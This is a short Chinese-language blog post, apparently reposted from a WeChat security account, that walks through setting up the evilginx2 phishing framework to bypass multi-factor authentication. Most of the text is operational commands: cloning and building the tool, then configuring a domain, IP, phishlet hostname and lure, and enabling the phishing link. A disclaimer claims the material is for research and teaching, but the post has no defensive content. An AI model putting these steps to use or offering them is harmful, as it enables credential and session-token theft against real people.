很久没更新了给大家说句Sorry,最近感觉比较累但不知道在累什么,感谢大家一直的关注,如果担心后续找不到推送的话可以设置一下星标。
免责声明
简介
https://github.com/kgretzky/evilginx2
基本配置
git clone https://github.com/kgretzky/evilginx2.git
go build
./evilginx
https://help.evilginx.com/docs/phishlet-format
实战演练
# 配置域名
config domain xxx.abc.com
# 配置IP
config ipv4 x.x.x.x
# 配置跳转url
config redirect_url https://xxx.abc.com
# 配置example的hostname
phishlets hostname example xxx.www.abc.com
# 为example创建钓鱼诱饵
lures create example
# 获取钓鱼链接
lures get-url 0
# 启动钓鱼程序
phishlets enable example
# 取消隐藏钓鱼程序(否则全部跳转)
phishlets unhide example
https://medium.com/@jakemcgreevy/bypass-mfa-is-as-easy-as-1-2-3-fb4bdc1f8282
原文始发于微信公众号(Hack All):绕过MFA就像1..2..3..!一样简单
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论